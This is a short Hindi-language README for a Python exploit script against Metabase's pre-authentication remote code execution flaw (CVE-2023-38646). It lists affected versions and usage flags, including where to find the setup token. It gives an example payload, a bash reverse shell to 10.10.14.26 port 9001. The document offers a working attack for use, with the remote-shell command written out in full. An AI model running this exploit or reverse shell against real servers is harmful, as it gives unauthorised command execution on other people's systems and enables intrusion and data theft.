
Metabase में Pre-Auth RCE (CVE-2023-38646) के लिए Exploit स्क्रिप्ट
यह एक पायथन स्क्रिप्ट है जो Metabase के लॉगिन सॉफ़्टवेयर की रिमोट कोड एक्ज़ीक्यूशन कमजोरी का फायदा उठाती है। यह हमें प्रमाणीकरण से पहले सर्वर पर मनमाने आदेशों को निष्पादित करने की अनुमति देती है।
असुरक्षित संस्करण हैं: Metabase ओपन सोर्स 0.46.6.1 से पहले और Metabase Enterprise 1.46.6.1 से पहले
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help यह सहायता संदेश दिखाएं और बाहर निकलें
-u URL, --url URL लक्ष्य URL
-t TOKEN, --token TOKEN
/api/session/properties में मिला सेटअप-टोकन
-c COMMAND, --command COMMAND
लक्ष्य होस्ट पर निष्पादित किया जाने वाला आदेश

उपयोग किया गया आदेश: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1
Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)